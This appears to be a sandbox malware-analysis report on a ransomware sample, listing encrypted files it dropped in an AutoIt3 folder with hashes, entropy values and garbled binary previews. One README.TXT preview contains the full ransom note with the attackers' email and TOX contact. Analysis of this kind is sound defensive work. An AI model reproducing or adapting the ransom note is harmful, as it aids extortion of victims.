                                SHA-512:4EA97C3C5DDAB1FA6CC2FA82090EB4C0B7E23ACA5E422FAB9AAB17936BB4FAC25D995241E9F5657A27E8B14EFEAEF9E4FD9AEC73C824695FC0D7C2DBCF365AF8
                                Malicious:true
                                Reputation:low
                                Preview:.Q.1..+0.^s.o..yQ.....Y..........f>..wO~....G....s.n..........;.-w......e.$...+......TB......."t2w.#.?XG$9.s..C...V..........nH^..7.\.w..X....:e.j'ey..B.z..>[q.....w........-...#..)...2..:..H...k.ef.+..!..Y...n...<.5l[..A'..C.).V.Bt..a.."E<..f...G.+.J.3....&.......j.d...)a.T.. ..k..:.>E....P.b.....;..58.W.MR'...e|.d.6.jt.n....].yh..&.4......\b=9.....)..:..Z...#.r./.B.Y..).(......_^.....[.0.z..S.4L...N....*.{.F.if...9.e.?.L...A...^..f...f~P....'..k....Z..]..1H$.8...5&...3.- xVk.....dC',...33......:......v...,g...7w...^.Xz.j;...........#...L...#...G...?.......|0.|=i.L../F.~6..n..S......,@.M.p.`.]W.(k.*N.N........V.......6..t(..7.....j.L_..OKr.....Pu[.m..........k^.xX<3..Rd.!..p......y8.{.......I.@eR...J.U...=..6..s*n.uC.D.q.?....._./..g.J.F..2.....{'..!NI..i..f.C.r.}........XA....X3......4lr..e.......Q..l.(i.3S...W4.....J......@...X..S.~.>..2.%....s....J..l~._rR....nsJ#>...%9.d.B..&}.@..u.a.D...D.tX.JKT..>..od.m.@*..-.9.8..C

                                C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):125112
                                Entropy (8bit):7.9985858202799855
                                Encrypted:true
                                SSDEEP:3072:JWPZVHAMB6KphLPMsyKbwlqLHfZS8eKvjmqEi5XvNnUy:0PZZA+jpV1bl/ZSxKvjmW5fNv
                                MD5:97DEEC4E633419F9D560AB655B76E0A1
                                SHA1:18B3F7535A49CE230E8A1F6AD301330249BDDFED
                                SHA-256:A59915E7A6C88250D8E991F2B48865F1677B8800CF3050A88C5880310267FBE4
                                SHA-512:5254096FF248ACE2C6CA9BA0A8901835CF3C8CEDDE250EB29E88077037EF5E761001D8BB3FF8E701AF79F3EA00D1A7C2CC8E47C99BAC4EB539057794F5AC2FFD
                                Malicious:true
                                Preview:f.+...Q8./iY....."..7[..a..a.4.. Kp...k 4....... .R+.d......P..l.z.T..bN....$..HU....sj...u.....C.E..:%..^...y...!x.29..MU....Y.f.... ...v4...kB]...+......C....YO..k...C;s..=..j>]q..V....CL...7..[...1o.).....*.\.k........`*.3.D....5.p.U....E.o...T...0...R...t7.D..l]..V...&.t..s.|.;...@......x./....S.yN....-..p...A%Q..o..."$..{....H...0.w...-... I).x.....8.wR..~..+.|8....."..lj.H...ADCO+..&.y.tM..-P.=.d....3......Vn.....T......j.TQ.H....C.....O.I..kV@M..O.I...q..(#.]...r.......>L..........Xw...6W.....R....w9.QY.'....&..l.6.!..2...<o..._>..>Q..*...(.\.=.:%.T......9]._......[._.'h...Hb.x.!...3....<Y@QT...*...o...%......K.'..`.Z..+6.*..tV*...1..q^t06.l.....1.B.........d&._#.c...].d2.-.?..."...5.JvG..o...PX{$=....K..$<.<..p.L!...JzP.D..W/F.......F.}...+.IL...Wr..O........O.c./BhS..Z........./....N..|z..#..S..O[..tY.`._.J..q.........8...~..GrG...1ozf..k.U....)....t..wi`..g..:....M......Y.......s..iaF..d.".FLu....Z.!|.s.7e.A...tS..}.Hz

                                C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1072312
                                Entropy (8bit):7.042915404968756
                                Encrypted:false
                                SSDEEP:24576:ZLsWUon6Rb6qu1PyC+NRLtpScpzbtT7pyOolKLLfHB5O2cxaNIdU:+on6AqSPyC+NltpScpzbtvpJoMXD7kaN
                                MD5:9A40E1B6F8BC2EF3DCDE954B92ECACFF
                                SHA1:9CFAEEFB9ED9D5720DA7B0B109D2C8F003087E5D
                                SHA-256:8747E687691FBD950D400B6659AA27B6D746F1A93DD22701895ED05975B102A1
                                SHA-512:809F6301E35C4646C07BCBD60E5C2DE91BC7346EA02B18A18827F3A140FCA67A31F83C2C61ED8FD005BC6ADA5F196CB7EFD6232866CCD4F2EE7E72601F54AAEE
                                Malicious:true
                                Preview:..v.n.=...d..K.F...........d.^.t..l.D.A/vf...........O....O^E...<Z..u...Q~..u...:r.Py.<I....`..[...!.......-.'.7..1.K.Z]*?..#l.."......7......u`.~..E...6...z%......$....GA.......{.....m+QI.....]..`^.........e..U._q....l.....K=...>=N.0..t.\..r.<..O...\..r.........t!....v?;.?.....~..~./.+....N8...z....../...h|6..j[Etu..Ekh&.......J..*.0./._.l..x....^.T..kRCV.av.H.{d...f.....3.Ih.%3#..xi..2....U..'.1.j.V}#`%.........~X.l.X.j...;...X...i...?.O.k'.m....v@...V.wK.. ..d.c.........eQ|*n..r...O....4[..=....g?.uL..+d<.>n.eh....;<.^...Rn..kG.~UI.)..nT.qgL.V.g@..G^0....%...+">T.).e7..a..o;..%......b....BN;^.by...g6h..u...W=[r...m.B...u../..,..D..D.YX..J..........X...i...,...;|/..7..'.A.........Ki.6~et&..H.(..t.@#.....'..Ea..8[...3..*}-.M.(..L%..D$.../...\..Q....+.}d.G..r.>......T.?4..VS...T....2......i1RS...6..F*>WgrcK....yt...R..\p.X.?..g.... >.y......F7.K...Y..OWK...3..+:%...c_yC..s.Ty..a..AO.\BU.@..$....&$.....<...,I..~......u.

                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX.chm

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):200994
                                Entropy (8bit):7.9990215482457305
                                Encrypted:true
                                SSDEEP:6144:vKBCZ3b8J9LYK2hI4oKsqoNEivjx9OYq0kuGcn:vQCru9T2fsqkEiVsZHcn
                                MD5:2AD5DA53E4EC1CA88D321888E1C1DF26
                                SHA1:09C82F2431F6FBD58E0A57AB7BCE6FF23F0E6190
                                SHA-256:131F36DB31E41D4B6FF945E1E020A0A8A55CAC7A41B6A0DC4EB34F058C08BE7E
                                SHA-512:FCFEABB6A09364B0C734D147A65E638E303CAA440201E9FAA742EF5D6699CA0B2DA5CC959AF1644EF1F27C9FBE77EEBC2DFE4F580C4976FD9B0F08B9028C2329
                                Malicious:true
                                Preview:.0f....;.O.V.....Y."|...?.....z.XV.5..5=.T.^H...E.x.`e.3R.L...?.....q..$.<6-5o,......N..y ../..X.>'.$)Dx..m....N.*.+....yqXEk......`?_.Z%D.r.*._.6...k../...b.[9.r..".=...QU9pg.{.P..k^...w0 .C...4m'k29&.6\j...N......3K$[o4....s.mS.?....!.....C*...>rxWQ>.@..2. C...m@.......u?......:^.t.). .A4N....k$..33L.\....7JiV_...#..].~.(..Z.Zg..f.lhA..F.......!.(9.#K..`..F.$..z...k..G~...).odY......{<.Q.Cj...~S.....`>.._......o.-a.+..2'......rO....G.$..p....D..6><.|.R...ESU.w......I.. .%?80.3#9..y./........t+.E.H..^....G:>.p%.2.!......N[.K....x....Z....-.p/.E"C..,ZL....9.\QL.......w...ta.~!.~..h..O..%{T..G...kpw.m6..../3!..-g.1>eX.D.Vt9\7|._..S.j..h.....5Wl.............3V.k.WsB..Uct.;.a!}..^....?w.&.....g..<.A......N..U....%..T9`............v`...F,@...T.b..(0L..).BeF.CQ`.g"..>..E..'........-....q...p.=%q..g..k.!&y..s..)6.....r........}...j..N..T.,:.nqn.i.P..c..K;....=-....5.^.J'.'.h.p{..v....Yk..;"......*....`..,c....o4&c.....&9.e..*x.ah

                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX.psd1

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34062
                                Entropy (8bit):7.994227657485516
                                Encrypted:true
                                SSDEEP:768:gg6BwT9uc8XkBVwgWhTOXBGSfP0+R3zf/SzjruzRAJfb2T3Hws:8Bwl8VxhToPBDSzPyRk23t
                                MD5:194638EF54FED96EFAE023E0CF09B9DD
                                SHA1:670EBA95FF1B27FF91DEE4C4AE205F0A79ACA31A
                                SHA-256:78778C65D08827B94F583CA11A4C7383C65D2499C4BFB6C40E9FF0A0EA926271
                                SHA-512:AB636B97864D8D43BB91E1BA2992ED86E2265219C8BE957C25EF3EEEC63FB3359EC7DFAF5DCF3E8C1ACE60673F06563410D4F5DB14ABB921A0416862C6B3825C
                                Malicious:true
                                Preview:F....f...\.[X.S..z.....6u..;......E..g...*...z.Iz.t......J..S...+/.l.........e..9)S.d.9X.....2..(....I.x._.QGR.Lz...........vrm..:..&%...:T....N....gf_".^)..)..........y.g}.y.H.cj5.?.........O.e|q?.C.f.Fgh.i..D.....}.....H.a..L.....$I.?....V7#MB...H.'..B&~.m.........zd=._....x$.!.6.4.....9.o.'.,.=.%X..k49.......<..@...n...Q...V...<.rG.1D..l.zzF9..{sZ.E..)s....yt..|...[.h{..k........7....(..R.F....rL..._........0QS..5.=.\.g.g\."..g.....\v.s.v7s....'od...y.....R.d..>.i;......1%4......j......j...M.'..-..y....aXyw.....p'd....7Dr...E..M...T...M.%p ...W..X../;.....e.).)..h...k.L~.N....=.N#.L......(....B.v....u(O.N.;...'.$..b=......o..&e..zV....!:.$z$.%..~p.T.$o...6.W....43gO.q....C.#...M...o..I....L.^. ..%..#..i..z..\.s2..$....O&t..q..".fMo....t{....v8.&4*.=........Dhj..j.h.K..(6!m..3E.4..8.]....s.mr....2...l#..I......tz....%%R...S...H...X.~3}Qd.S..^...Q......0.$P....~.\.......".g.e.}...!.9.?*.....NF?.mA<...@.H..sr0]4....E.|M....t......No.`..

                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):44736
                                Entropy (8bit):7.995962492060327
                                Encrypted:true
                                SSDEEP:768:z/4xeuJ1ElyGDDdmDIyob8J20C5CxV6j0OS+MSo/usYx7BExAlMZpI0kMa:z/8PWlhFz0x40ZpiFEalMXI0va
                                MD5:501295E3810366FF26462A6046F06EF8
                                SHA1:558CB519E77EB8E3313ECD40364B7C42A86840E7
                                SHA-256:90C1533764AAEAA36FCBA6EF04B2F009717BC79783269D68110319F54E565A34
                                SHA-512:9C746FE99D0B0B4C85CF2B8A42BB1F642008EADB243AE438482FE7717A336E415FC9EC36F6DBD3705E892A40D01CAB8470DC2FC7EB4941B137CEB8205865369D
                                Malicious:true
                                Preview:.?.7f.i#n.?e4....56QO..b.*..v.A.s=Q...9@..,m/[<.....f.G.G`..U...N.......9l....O..+.~..x.a...,..LIT^...%.....m2x`..^.......x.}VT.....S.7......:o...'3.....=.G):.$S..w./.w....-........K...8..o..E.8..~.M..w..7...n/`._Uid.Z.=...CV.=g........!I.ac..!..6=.....T"$.s~.7..SA1..]...cL.U.y..!pW.....nA.H1yq..r.l....s.OY.^3.Z.XE..s.;.m_W.)"V&.\_.H.R".y..x..m.H4........0\o.@.._|.U..r.:..o.W0......+....S..]xK..B..Y...J...F.J..W.X..."..4h.x.2}.n'...".O...G..-.7.....uP..!."q&2..0...R..U>.....h...B..'!...z.a...L....../...,p:.n.Lk.j.P.*I...y....7`..5X\_...yr..{..~I.DR.M........[.._....{o..w.7ShV.........k*Qr}{kO7)5D..f{.9........)k.rM.dw.q]n\............Ws.a........ij.....j*..XT.C.....A....7..8...b]3...yl3.QV...$.--.(...c*.B=.......YI=.H.f..D...k.#..q..RQ.9....=P.E.b..=.$q.b.X!^.urs.H...o2.T.O1.....,].$.;.p...E_..c.l!{{.h.OV...cm...I.F<..($.U...a. ...u.r."K....j|...XE.:95A.+...O,]..~..sW.@..8..K....].......yG.I.S...`.Q..8..f...b-.Z...B..G9..U%.u."..z,.

                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):50126
                                Entropy (8bit):7.9961025303649045
                                Encrypted:true
                                SSDEEP:1536:9w7D3ctmJzLzokJoekSEJp3biUqEsRFi88gIox0t8:9w7jlXEkJoezEJp3biUpscG0t8
                                MD5:E1C4EB68729093D7F802B9C303053E7E
                                SHA1:65CA79F744FBCC518BB13E4F7F50ACCD1D36BD20
                                SHA-256:FB9C29EC4257F1E76ACE687A995F78F934BD85D0632DB173DCCBB5E0B23B7F62
                                SHA-512:89685CABC2BB2A98E46AFD84A8E5477DFB50D193714559DE7161CC89ADAF5FA07A23C73BA230697015C34F4B03165C5364DA831A9AE11BD71F0F95E2B3A987DE
                                Malicious:true
                                Preview:..1K..N.;^a(..V..=.<...9m.V=....g...U.._k.#}.............H..........U._b..$.S........5.q...Q..b.<.e*.w......u..h..A.......\.J.... =xU.-.Jqc.D.LR?H.A$.F.D......M-...%O`..^..g....u.wExG-B.%.;k ....&..6)......72.{.&..%n.LF.=.E......}..0..!.Bm...*b...X.9........bMo........].(.ul..=7...4..B.ra...+h+.l....oAA...".....ajvZ.H.y.K.....aB.e;.#..@..^Ea....On.rB..,I....V5...>...!?..._...p-Z..pBh....n.0.T.".e.K.%.L3..qVl..W.....sw-..p..$/.XH...P...@...M...k.TE.'y.4.N.W.2...F.....K...!......{B.......dZ.t.mT5Ie.L.R.."..1>E.gJHt3.7}zLk.O.V.8.)A.s.S...I.cl.~8...sUL.....$.....d&....G2..z$.{........9.~.;,.L.=o..E..8(.....%j..8.m|.~.".....2.e..gR.F...9~.....T..C,..3._.l.....j.'...3..=.4........G'...~...}...*f.f3..^&..@f.z.2Q...:....b.~..%..1.kG..y'..z..jD........fMm..g}Y.6i#....v..T.h.m.C.......i.,P.n..w...H..u.`..,.......[.j...h..h.nF.S......9.~O.5.De..F.yi.{O.D.+..v............w$5.J....d`.L,.kF...6.v..N`s..6V*zt.....K su.1z,t8..'`..l.M..!.

                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):53952
                                Entropy (8bit):7.996142365762297
                                Encrypted:true
                                SSDEEP:1536:FvNnr+NU8JrqTpmlW1zcmyPlVcwJdqEiX6eN:RkpJrqTEl2cyidaN
                                MD5:DDC1B6C8056A292120E89D7253707226
                                SHA1:D5E031FAA5E8031F3665EE2D0D674EF9A85C9E9D
                                SHA-256:4C02B1AA311CD87A5A68BF26168FDBE9BB395690FD95AB4C4AD24EEEE070776D
                                SHA-512:45C19766C51FC3D945D4761AB0FE05B3F76F348732FFB6411057DD1910FB4E0D886994CFDCF32581F534DDA1C605591C78645821B4FD530106A1370960F7BEA8
                                Malicious:true
                                Preview:S.I.^.u..$6$.w.X$..Cg.U..)...8l_R.....2....;...Y...CE.J.....|..K....!.-...]...pr.f.0.l(t.*Y..{.u..NcF.k...........U.x7@.h.....SM...*Z"O.t..^".X.v...7.{.U...?k...c,v..:.3..rU..<.v6|...\...y..,..L..#.Uy....#I.(.x..o*.....F..".{...]x.....,....#Ebd..$.9.O....W..O+P+r./.s=.7....;..[..7.L.......'LG.@O.x|.......8..0..I.(....F.B.K._,.)s,...wv..3...k.y`.......kh-V.d..k...PN.6.&b..4dc.q.....B..G.J(..&.....E'..BK.|.v.Y>....K...Z..m..JC.Y...EXr...`.I.I4...~..;dY..jo..8...a."............#...8.....(V...%..j..YQ=6.!..>......:..E71>...b.8&.5.........p. .}..h;...3.....E...&..B-.......Z......:....M...=....\.....U..:RH|.&E......a.5~o.s(...e.q.=...Bp.H.W.OJ..N}.2{.@...Y.f'.n.Wz.eZd.A.M,...0V{k....X....0/-rOJ..F.<L....at.U.l.X....7.#.......,..K..a...C...b$.|l........I.E.{`......|........1....vDs5U.`^..........y.>,.,6..T.U.s.O...I...*.6....m..........|.(p....M5..9..?.....J.3by=......tE9.....lSp.D6........Y............K%....$\......Q@.aU."....`.tt..N.U.t.

                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):727248
                                Entropy (8bit):7.54530492891434
                                Encrypted:false
                                SSDEEP:12288:NAv2/xE/TfXA0F1ll7I4zXXRpR4uBkrdyWbh1v/Q2G9d4lOiezp4xFuM2IL:NmWxyTfXAGRCrsE1XpY4qzubVL
                                MD5:D9ACF169A824F28B1C9D68CED0D4A8D5
                                SHA1:7F46DC43EE7099AAB844BECF0BCBCD9047DF7D95
                                SHA-256:37027F25E22A5982C1E51760D550A536C7C069EE9EC7A2C24B301BAD18BE0D59
                                SHA-512:DCABA78B8E3D40B4A55FFE4008BD08029EC5E9EF1421083BEE233BA18F76BAC9DA7AD16F80DAEBC06034046374ED078B4B5FA7258A5C45E292CF69EF2643A0B8
                                Malicious:true
                                Preview:.....?.^.L.%{i.ji..m.W.l...=....6WB.....c.'..K-.....B.sP. .Cy..).6A.. ...... .z.g.K;..N*E/.o.....lB6.,>...w..E..L2..U.L.K./.08.:H..2.oF<K....q...N.d..&%:H..!..Hp..]F....8<%........Q.K.LaV.B...'.....T..{F... ....?..#I.|.Z_.).S..U.sb]..Tm0.,S3.[._.u....`~....BQ..Yq.-k......f_..8-p|.}$.:.z..../$q~......._.P.n><..G..=.....,......'.:.yH..AW.$c...P..e;..B.3.'.....H..g2;Xl...yK/..tE.4.<.f.....}._\E.cB....p.8o;.n..=.u...A....37L)0(.2Y......f:l(.T..ZB..`J.H...ss...iM$Z.....F.;.,.....fE.Q...s.3D........@...._I........X.OT.S...+.V.....5.5$...f..+au}..@_.k........I^.:.3.\ox..v...)...N.~.p.?.....l..?.y..p.O<....a.6.M.nox.}|.._..6.'..?Fe.D.E..\....L+...4..........'1..u.Q+e.=nH.WZ9.c..M......./..[:....g..dE..N........0....e..K...K).A.L.....l....2b.).Vt.-.U....]8u....m9]h...$.....+..R..\.>i(.H....|9..M.AyK..._..RiZ6#...#*...4......<wM=.I$!.k<>.0...X.....V.....L<O*".O...M.|mQE.....V..4...?~LV....u....p.ab..,y..E.18.d....M..s.Y...A..{.....bU .........

                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_DLL.h

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13601
                                Entropy (8bit):7.983221224499428
                                Encrypted:false
                                SSDEEP:192:tYyE5lk52JOO25uOA0MwO1d6hUfDIzXwCTbz0Fj07S8Oyb1yo3/ube9B6fx+VOy:Czm2J6u/d62D4XFej0+yhtGbe92+VOy
                                MD5:228C32A343F3D291286FAC3475B996A5
                                SHA1:F27B617C47397BC4330416A1EE927EB212ED094B
                                SHA-256:5471EF50559AA7365A633D502EEBC078D0C437B00DCE68E11E5DA059B01F8B22
                                SHA-512:178A9DE7F07B8E63892DBF4F2FF083346CC57320B1F2D1EDC65378CD45AB570E16EA199FBFBA84A1C01CD855E278A1F73D09626302183286283DA94C650A6848
                                Malicious:false
                                Preview:....k.#.'.{..f...X~..3.F:...P......=..=.....T.. *...X.../....8 ......S...4JY..ym...Cm.0....../r.........pJ....-L.............. .1.......haP.<......-*...zW..({.M.A........+...p..4.a..;....j.'.fM..5s..g;h...F..]^..Y[...........K@}.).O...V.2.3.FG0%q.w.I.....|...c...V.I\$q~..|....Vo&..e..S"..G..-b..Ov....k.-?....2.I"..x.%.l..'.P.?9....-e ....=.EU..p.~.R.w|Z,M.r...t['....?.7W.Nk.....`..O.b.b....MI..+!.Ot}..X1..V]....34......U.. ..u....I..PZ...Z.mK..f...M<i..M.9..Z....E..S.k..Ud.%...@.C.R...P......0e.7......P........*..p....t.R..x~..y0...Zv...C+..M.H.D..W3.T....,.}.I&.........;.%3.V.-...;...F.Z....5?d...o.n.&m.-....}>....=..%.{..c.........~........5?.G4t...N.Aq....~....(...a....Q..$CW.)..<`i.3.2.).P..W{.d_$.........h}.rHF....DQ32...x.Lr;...j.q......i...L.r..0.....q}:.c.A.z.`oO..3...-VY.:..p.Z.E*.@j=)X.B7...m..l(._U.....@..Jf.le.<..=_..m....cB<|..M.J...R..~n..n..].f.^...../......^0G.,.....).(9.%...((.....8I{.b...P......`<.......j...U0....G_w........

                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_DLL.lib

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29584
                                Entropy (8bit):7.994526651388148
                                Encrypted:true
                                SSDEEP:768:+yK1t1xk6Q1cDmMt/P0MJ77mO98fl0y4tLu4LY:81q6KcD1/P0ii8by4dc
                                MD5:35E4607D6D1847E241ABB915EA0AFE85
                                SHA1:6EBF1377931629FA09E054C7224DDB7D5B9C6031
                                SHA-256:5BD93254C5164C607BDD196E17A6B723D12049A623D1666CDE9C793992667F2F
                                SHA-512:1B7B83665BFC273727BE351D43889AC1651D205A3AD2B52A639FB2D1C7D50C086409B93B4586EAD9FB51CFCDF3925F530A5B544A6535BF2B45BFAC9A8C9CCFF9
                                Malicious:true
                                Preview:..*HG[.^v..G.y.>.z.0.n.i~.*KF.g.....~Y..I.".C...S.%-.t,.H.[.8..S.H.....k.`..o.}..I..6..aM8.........."jP..p..8.B.?.C/.8\......S.Lg=./...H=....oX^{..6.al....|QT.h *.u!.k.ea...?.0.i...C...[.......''*.C/.Gc..W./..H..J.p.m9. ..R.L.\...........L6.].E'..=.....n..m.....9.X...}...K...k.P..:J..D...o......./....`X=Y.g.+..4.\>..Z0.2....U....7.l..O.7...(-.b.}M.&R._$Q.-o..a.p......?.Bnz.6.7c)..m......6..U^..vc5..c:...A1....w.....D.dp.Kf....v.O.YP.m..ru..p;?...,[...I.b..f.!.+.6j..pXtz...v.{....p.$%8...lB.....j.[.oxM...\...N.=l5....Ro.Z..w.$..Q[,....o..m]..Y....ubB....W.V.c...Q.D.L......r~hx....@..3.8A..H.!...<.....W..i%=..K...xO......(..']M.7....:.A..&..@L.r.z...jN...:?.H....q...&H.?.[;@.*.e..C.....Fe....M..[.g........W...z.1.{..X..?2.3..oC.0.....e..=....hL.......%I...f[.>.../.AL.#...0..hG....|_..C.K"...a...-..;t..D......BH...\x.k......8<..........~....i..........+..=Q.....OpO!.EpN....x.0...b....P...nd...-.$.u.!%.r.ou.. :Mv.gpN......Ie..{..3..?

                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_x64.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):921296
                                Entropy (8bit):7.15979202597751
                                Encrypted:false
                                SSDEEP:24576:2t0yRV0GZzcgyxUbCPnImH52jW5dG+Fabp:2S+V0GuHMjW5aN
                                MD5:BB5CA076A2C8CCA0930F5A6263626A43
                                SHA1:25FC19EEA2DCFC14CBC7CE86C284D16DC21FDE1F
                                SHA-256:BBED363836AE4C1F64C78443C44F699C103F6F22CE522883CCD3FA1F046CD050
                                SHA-512:3F2E88551F326EB443681C64B753F29909FA41A5448DAA98CA0EC3899C6C846C4C555481EFD4519021CA9B3CFCECDEA2DF36F89AABA053F9D67BD6068AD47D17
                                Malicious:true
                                Preview:..}_-c..M@./....j..(1...%..nf..JJ...._..)..u.zs.....8my...%3.....d........6.`.f.\..<e.....&.}}k,p.0...=.g.A.gV..a.pd.Q.n .q=(.....$.92.F......us5-z..$.*...t..E.E..e1f^..&..T..gN.......N......I..%8]prQM.7...-ydO|..2..Z.w.1.....q.^...v.j..rF.X...n.P.]...kB..>.8...R..,r..1..-..a....do.B..?I..x.......$(.6.(V...m.l...-Z*.}..,M..9>.......j..r.b.D.....w.o+.#...gNV6.. ...2..E.P.W:.0:.3...Y....4../....m.u.....g9.1..ed.2....8^!..S....c 5e&..'.7.T..h....cQ.^.K-,....;f*Q...=pt...{.S.._._,%.........J..D.....!..f;(..^.+%S..b..yb`).|...jQ..u./H...9..n.!u......}5.~A.......F]......}|.ix.A.y+........i.X....~OQ......I...31Mn6..:..x._...MmF..:.....;wP...R..x.E{*........mwP@...*........3.(N.......B...!.2.lm? "...o.L..\S.......:S...N....9.o../^.Pks.}...j..K...r.!...`..@=|D.|..=...\...yQ.1^a..%..W%..qJ...S.Z#}_..d.C..!.....7......-v]..&.....|......$^@...vzo.Z.TIns:'p.....T.j.... ..t..[....Z~n.SA(.(..l..Y..Q..|.x..K{.K.._...xG..-..M.N.iI.%..........>.+Kv...

                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_x64_DLL.lib

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):28154
                                Entropy (8bit):7.993722721890511
                                Encrypted:true
                                SSDEEP:768:PABJTEFKs4FOV6pUbr/t+spf/KSxP9M5MeKvnj1IVPeR0H:0hEd4Fwh+G/KSxO5pKvnj6PeRO
                                MD5:EA0DA680B9484333A3BD95DF422FAD04
                                SHA1:D154E948152899B8E4842BEC241241E62695146C
                                SHA-256:B27AB290002DA1C76024494BD44D722AD3214D40B743CA5542B3DE9EE87562FF
                                SHA-512:683960C31E1D60ECD1CE5DD726052E56F152CD407BA3EC3BACAB1C129793C4AC3524F74B65A77524DC65763C034B4B4DE265E7D4FBE65E30D8794045DA61B21B
                                Malicious:true
                                Preview:.X{...|D.?.RM......>V....A.NX.&M..FZ...J{vsD. {N.%..{..E2?......I_yS..T...b.7....`....lq...1...l...9>..!.;.".u...Qx'n..<6.v;%..#/......g.pF3N.A.u.)...q h..q."g.,...$.s%su/....)|..Vcj.m.K.C....2j...c.w}...s.S|11..v.=9...wC....?...:.a+.Y9....*:,&fX.t....7.a8.e.be.$.(M..\.jpRX..s.........f..@..V2........."....h...."{j...k.-..7x.=..........F.[.3.L}.....Ab..N./...P?(:.s.-.x..k*v=4.I.l.)m...|...g>[....@..zD....P.q&.;.aT..L..O.........V.p...g.i....+ m9.+....U2.#L.k.GG~c.*..#<,l..$=...nM.hk..o.s........e.a..k?.U.'.k1DY..Ub^......f...$].w..H......L....M1_t4 .J...._.{....O..U...2...eX.&D......V......sW.`.l...*H$..5D".9.%....`..C....8..$...h..S....U....wn...6C._.M...R...1.~....p..h.|.:).W.Y9...H.'......!......6.$w..B,a.a....&nNs....m.]....uz.R.].h.h.T.....K.1D)....G...[.2....`k.....6.Dhu.@(/u'.Vz>......... U0=......7\}8.0.j..w....M..n."...J.-C.f.A..o\.eW....]o@......t7U#.....6_p........B..H@.@.o.......vd....6.?...h...vrz~.S.z..v..q.A...hJ.gV.|.\.#D.,.

                                C:\Program Files (x86)\AutoIt3\AutoItX\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\Examples\GUI\Advanced\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
